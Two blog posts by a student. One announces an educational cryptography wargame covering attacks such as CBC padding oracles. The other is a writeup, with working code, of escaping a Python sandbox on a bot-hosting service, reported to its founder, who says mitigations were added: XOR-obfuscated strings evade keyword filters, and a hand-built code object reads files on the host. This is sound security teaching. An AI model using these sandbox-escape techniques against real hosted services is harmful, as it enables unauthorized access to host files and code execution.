Tuesday, December 9, 2014

Blackbox: A Cryptography Wargame

Intro.

This semester at RPI, I did an independent study called Practical Attacks Against Cryptosystems, based heavily around the Matasano Crypto Challenges. I have taken the two cryptography courses offered at RPI (and enjoyed both quite a bit!), but wanted to gain some more experience in identifying and exploiting "real world" cryptographic vulnerabilities, especially after interning at Matasano and hearing about just how common these issues are. The challenges do a great job of showcasing how seemingly minor implementation details can completely compromise systems that are cryptographically secure "on paper". If you're at all interested in these kinds of things, I highly recommend you take a look at them; they're quite approachable, you'll learn a ton, and they're fun!

As part of the independent study, I also made a series of CTF-style problems for the Cryptography and Network Security class at RPI. The basic idea was that each challenge would be a simple server with some cryptographic vulnerability that students would have to exploit. Exploiting the vulnerability would either give you a flag or allow you to decrypt ciphertext that contained one. Submitting the flag and solution code would earn extra credit points in the class. Most of the challenges were based directly on problems from the Matasano Crypto Challenges, and they loosely followed the class's syllabus.

The Wargame.

The primary motivation for creating this was to help "bridge the gap" between theory and practice in a hopefully entertaining way. The vast majority of class time is spent learning about cryptographic primitives, getting exposed to some of the underlying mathematics, and implementing various algorithms. Weaknesses and vulnerabilities are discussed, but there is no interactive component until the very end of the semester (a very cool final project that involves students implementing and attacking custom Bank-ATM protocols). This wargame filled that gap, and would hopefully get people "thinking like a bad guy" throughout the semester.

Overall, the system worked really well.  There was a core group of students that completed almost every challenge, and nearly every challenge had several solutions from students that were outside that group. Occasionally, someone would find a bug in my code or come up with an unexpected solution. It was certainly a learning experience for me.

Now that the semester is over, I've decided to package up and release the "wargame" on github. I don't have the time or resources to keep the server up indefinitely, but hopefully the code can be reused by others. Below is a list of topics that the wargame covers:
  • ECB Cut and Paste
  • CBC Bitflipping
  • CBC Padding Oracle
  • Poor Random Number Generation
  • PRNG Internal State Recreation
  • Length Extension Attack
  • Dual_EC_DRBG Backdoor

Final Thoughts.

Included in the github repo is a collection containing source code for the servers. blackbox.pwnz.org is the server that hosted the wargame during the semester. As of right now, the server is still up and hosting all of the challenges, so feel free to poke at them. They are accessible on ports 9000 through 9007. I don't promise they'll be up forever, but I won't immediately take them down either.

I decided not to include solutions since hopefully, some variant of this wargame will continue being used (at least at RPI, and maybe elsewhere). If you'd like to use the wargame as an education tool, or you want to host the challenges as part of your own wargame, get in touch and I can send you the solution code.

 The Github Repo!



Saturday, September 6, 2014

Bypassing a python sandbox by abusing code objects

A while ago, I stumbled upon a service that let you write python-bots to interact with a number of external services. The basic idea was that you only had to worry about your logic, and they would provide a wrapper around APIs and take care of hosting the bot for a monthly fee.

Python "jail" or sandbox escapes are fairly common in CTFs, and I knew that there are all sorts of "magical" ways of doing things in python, so I decided to poke around a bit. Sure enough, I found a way of circumventing the sandbox and getting (kind of) arbitrary python to run. I've since talked to the founder about this, and they've taken steps to mitigate the damage one could do (specifically, virtualization is used to protect the host system), so I thought I'd talk about some real world python-chaos :). With the level of access I had, I'm fairly sure it was possible to get a shell, and from there, who knows...

The remainder of this post will describe the process of breaking out of the sandbox they set up. Everything was written/tested on python 2.7.6.

At face value, the service was stripped of most dangerous components fairly well:
  • "Fun" modules could not be imported (sys, os, etc)
  • "Fun" keywords/functions got your script thrown out (exec, open(), read(), compile(), etc)
  • "Fun" attributes, nope! (myfunc.func_code)
  •  Fun stuff couldn't even be in static strings! (Annoying, but not really that important). 
The last point was the easiest to get around. Just send up a list of xor'd values, and dynamically build whatever string you need.
# Each value is one character of the target string XORed with 0x41
str1 = [30, 30, 35, 52, 40, 45, 53, 40, 47, 50, 30, 30]
for i in range(0, len(str1)):
    str1[i] = chr(str1[i] ^ 0x41)
str1 = ''.join(str1)  # "__builtins__"
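As a rough illustration of why this works, here is a minimal sketch of the encoding side next to a naive substring filter. It is written for Python 3 (the post itself targets 2.7.6), and BLOCKLIST, naive_filter, encode and decode are hypothetical names made up for the example. The real service's filter was never published and was presumably more involved.

```python
KEY = 0x41  # same single-byte XOR key as in the snippet above

# Hypothetical stand-in for a filter that rejects scripts containing banned substrings.
BLOCKLIST = ("__builtins__", "func_code", "exec", "compile")


def naive_filter(source):
    """Return True if the script text contains no blocklisted substring."""
    return not any(word in source for word in BLOCKLIST)


def encode(text, key=KEY):
    """Turn a string into the list of XORed integers that gets uploaded."""
    return [ord(ch) ^ key for ch in text]


def decode(values, key=KEY):
    """Rebuild the original string at runtime."""
    return "".join(chr(v ^ key) for v in values)


encoded = encode("__builtins__")
script = "str1 = %r" % (encoded,)

print(encoded)
print(naive_filter('name = "__builtins__"'))  # False: the literal is caught
print(naive_filter(script))                   # True: the encoded list is not
print(decode(encoded))
```

The point is only that the filter sees the script text, while the interesting string does not exist until the script runs.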
That gets us around most of the basic string-matching, but it still doesn't let us do anything interesting. The rest of the exploit relies on code objects. If you're not familiar with them, this is a great overview.

So, normally, python allows you to access all the guts of functions. A function is basically a wrapper for a code-object, and (as the name implies) you can access and modify these objects as you like. The python interpreter acts as a sort of VM, fetching and executing bytecode found inside code-objects. Python bytecode is assembly-ish. You can take a look here if you want to play around.
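To make the "function wraps a code object" idea concrete, here is a small sketch, assuming Python 3, where the attribute is spelled __code__ (func_code is the 2.x-only name). The two functions are made up for the example.

```python
def greet():
    return "hello"


def farewell():
    return "goodbye"


code_obj = greet.__code__
print(type(code_obj).__name__)  # code
print(code_obj.co_name)         # greet
print(len(code_obj.co_code))    # size of the raw bytecode; varies by version

# The function object is just a wrapper: swap the code object underneath it
# and the same name now runs different bytecode.
greet.__code__ = farewell.__code__
print(greet())                  # goodbye
```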

At first, it's tempting to just try directly modifying a dummy function's bytecode. However, that requires accessing the "func_code" member, which is explicitly blocked. Additionally, just modifying bytecode wouldn't be enough. Fortunately, it /was/ possible to get access to the code-object type through the "__code__" alias, which was not blocked.
cdbj = type(myfunc.__code__)

Now that we have the code-object type, we can use it to build a new code object filled in with our own values, and slide that into an empty function. The question at this point is: what do we fill it in with?
>>> dir(f.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', 
'__getattribute__','__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__'
, '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', 
'__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 
'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 
'co_stacksize', 'co_varnames']

So, that looks a bit intimidating, but really, we're only interested in a few of these. Specifically, I used
  • co_code: string of raw compiled bytecode
  • co_consts: tuple of constants used in the bytecode 
  • co_names: tuple of names referenced by the bytecode (globals and attributes; local variable names live in co_varnames)
  Most of the others are documented here if you want to take a look. 
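A quick way to see what lands in each field is to inspect a throwaway function. This is a sketch assuming Python 3; the function sample is hypothetical, and the exact contents of co_consts and co_code differ between interpreter versions.

```python
def sample(path):
    data = open(path).read()
    return len(data)


code_obj = sample.__code__

# Global and attribute names referenced by the bytecode: open, read, len.
print(code_obj.co_names)

# Arguments and local variables: path, data.
print(code_obj.co_varnames)

# Constants referenced by the bytecode (version dependent).
print(code_obj.co_consts)

# The raw bytecode itself (a bytes object on Python 3, a str on 2.7).
print(type(code_obj.co_code))
```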
I had an info-leak that gave me the path of an interesting file, so I wanted my bytecode to basically do: open(<filename>).read().

You can inspect bytecode in a user-friendly-ish way by using the dis module. This makes it easier to understand the fields we'll be filling in.

import dis
def read():
        return open("./poc.py",'r').read()

dis.dis(read.__code__)
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
 28           0 LOAD_GLOBAL              0 (open)
              3 LOAD_CONST               1 ('./poc.py')
              6 LOAD_CONST               2 ('r')
              9 CALL_FUNCTION            2
             12 LOAD_ATTR                1 (read)
             15 CALL_FUNCTION            0
             18 RETURN_VALUE        
Now, to actually access the bytecode that results in this:
bytecode = read.__code__.co_code
print bytecode.encode('hex')
>>> 7400006401006402008302006a010083000053
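The hex string can be checked against the dis listing by hand. In Python 2.7 bytecode, an opcode below 90 (HAVE_ARGUMENT) is a single byte, and any other opcode is followed by a two-byte little-endian argument. The sketch below decodes the string on that assumption; it runs on Python 3, decode_py27 is a made-up helper, and the opcode table only covers the five opcodes that appear in the listing above.

```python
HAVE_ARGUMENT = 90  # Python 2.7: opcodes >= 90 carry a 2-byte argument

# Only the opcodes that show up in the dis output above.
OPNAMES = {
    0x74: "LOAD_GLOBAL",
    0x64: "LOAD_CONST",
    0x83: "CALL_FUNCTION",
    0x6A: "LOAD_ATTR",
    0x53: "RETURN_VALUE",
}


def decode_py27(hex_bytecode):
    """Split a Python 2.7 bytecode hex string into (offset, opname, arg) tuples."""
    raw = bytes.fromhex(hex_bytecode)
    instructions = []
    offset = 0
    while offset < len(raw):
        opcode = raw[offset]
        name = OPNAMES.get(opcode, hex(opcode))
        if opcode >= HAVE_ARGUMENT:
            arg = raw[offset + 1] | (raw[offset + 2] << 8)
            instructions.append((offset, name, arg))
            offset += 3
        else:
            instructions.append((offset, name, None))
            offset += 1
    return instructions


listing = decode_py27("7400006401006402008302006a010083000053")
for offset, name, arg in listing:
    print(offset, name, arg)
```

The offsets and arguments line up with the dis output: the arguments to LOAD_CONST index into co_consts, and the arguments to LOAD_GLOBAL and LOAD_ATTR index into co_names.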
This gives us all the necessary pieces to create our code object. We can slide in our values like this:
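code = type(myfunc.__code__)        # Get the code type (calling it builds a code object)
bytecode = "7400006401006402008302006a010083000053".decode('hex')   # Raw bytecode from the previous step
filename = "./poc.py"             # File we want to read
consts = (None, filename, 'r')    # co_consts: indices 1 and 2 match the LOAD_CONST arguments
names = ('open', 'read')          # co_names: indices 0 and 1 match LOAD_GLOBAL / LOAD_ATTR
# Python 2.7 argument order: argcount, nlocals, stacksize, flags, codestring, constants,
# names, varnames, filename, name, firstlineno, lnotab, freevars, cellvars
codeobj = code(0, 0, 3, 64, bytecode, consts, names, (), 'noname', '<module>', 1, '', (), ())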
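If you want to try the same idea on Python 3, note that the positional constructor above is specific to 2.7: the argument list of the code type has changed several times since, and the bytecode format has too. A sturdier route, sketched here under the assumption of Python 3.8 or newer, is to start from a template function and swap fields with the code object's replace() method. This is not what the original exploit did; template and the "placeholder" constant are hypothetical.

```python
def template():
    # "placeholder" is a dummy constant that gets swapped out below.
    return open("placeholder", "r").read()


original = template.__code__
print(original.co_argcount, original.co_nlocals)  # 0 0
print(original.co_names)                          # ('open', 'read')

# Slide our own filename into the constants tuple, leaving the bytecode alone.
new_consts = tuple(
    "./poc.py" if const == "placeholder" else const
    for const in original.co_consts
)
patched = original.replace(co_consts=new_consts, co_name="noname")

print(patched.co_consts)
print(patched.co_code == original.co_code)        # True
```

Because the constant keeps its position in the tuple, the existing LOAD_CONST instructions pick up the new value without any bytecode editing.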
Great! Now we've created a code object with our desired functionality, without using anything that would trigger alerts. The only thing left to do is find a way to execute it! Thankfully, functions in python are quite malleable. You can read about all their attributes here.
First, we start off with an empty, "dummy" function, and grab its type, "function", which we can later call to build new function objects.
def f():
    pass
function = type(f)
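The nice property of this trick is that it reaches both constructors without importing anything. A small sketch, assuming Python 3 (the types import is there only to verify the claim and would not be part of a payload):

```python
import types  # only used to check the result, not needed by the trick itself


def f():
    pass


function = type(f)        # same object as types.FunctionType
code = type(f.__code__)   # same object as types.CodeType

print(function is types.FunctionType)  # True
print(code is types.CodeType)          # True

# Calling the function type builds a new function around an existing code object.
g = function(f.__code__, globals(), "renamed")
print(g.__name__, g())                 # renamed None
```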
Turns out there's one more major thing we need to do before we can slide in our code object. Python functions have a __globals__ attribute. This is described in the python documentation as: 

A reference to the dictionary that holds the function’s global variables — the global namespace of the module in which the function was defined.
Since the only thing we're worried about in our function is using the open() and read() built-in calls, we can create this dictionary easily enough.
import __builtin__
mydict = {}
mydict["__builtins__"] = __builtin__
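To see why the "__builtins__" entry matters, here is a sketch assuming Python 3, where the module is named builtins rather than __builtin__. Global names that are not found in the function's globals dictionary are looked up in whatever "__builtins__" points to, so that entry decides whether open() resolves at all. The function names and the limited_env dictionary are made up for the example.

```python
import builtins


def count_chars():
    return len("abcd")


def grab_open():
    return open


function = type(count_chars)

# Full builtins: every built-in name resolves.
full_env = {"__builtins__": builtins}
print(function(count_chars.__code__, full_env)())     # 4

# A restricted mapping: only the names listed here resolve.
limited_env = {"__builtins__": {"len": len}}
print(function(count_chars.__code__, limited_env)())  # 4

try:
    function(grab_open.__code__, limited_env)()
    blocked = False
except NameError:
    blocked = True
print(blocked)                                        # True
```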
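At this point, the only thing left to do is put all the pieces together. Using the "function" type we obtained before, we build a new function around our code object and globals dictionary; calling the function that comes back runs our bytecode: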
return function(codeobj, mydict, None, None, None)
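For playing with the whole chain locally on a modern interpreter, here is an end-to-end sketch. It assumes Python 3.8 or newer and swaps the hand-written 2.7 bytecode for a template function patched with replace(), so it is an adaptation rather than the original exploit. build_reader, template, the temporary file, and the flag{demo} contents are all hypothetical.

```python
import builtins
import os
import tempfile


def template():
    return open("placeholder", "r").read()


def build_reader(path):
    """Build a function that reads `path`, without calling open() in this scope."""
    base = template.__code__
    consts = tuple(path if c == "placeholder" else c for c in base.co_consts)
    codeobj = base.replace(co_consts=consts)

    function = type(template)              # the "function" type
    mydict = {"__builtins__": builtins}    # minimal globals for open()/read()
    return function(codeobj, mydict, None, None, None)


with tempfile.TemporaryDirectory() as tmp:
    target = os.path.join(tmp, "poc.txt")
    with open(target, "w") as handle:
        handle.write("flag{demo}")

    reader = build_reader(target)
    result = reader()

print(result)  # flag{demo}
```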

So, in conclusion, we've created a code object and devised a way of executing it. Obviously, blocking a few more keywords would stop this particular attack, but it highlights the difficulty of getting this sort of thing right.

For some ideas of taking this to the next level, take a look at this CTF writeup that discusses using a read/write primitive to obtain shell-level remote code execution on the host system. Certainly something to keep in mind.

Actually getting this to execute on similar production environments will probably require a bit more obfuscation/creativity. However, I've put together an example script that ties together all the steps explained here into a simple package that you should be able to execute and play with locally. Enjoy! :)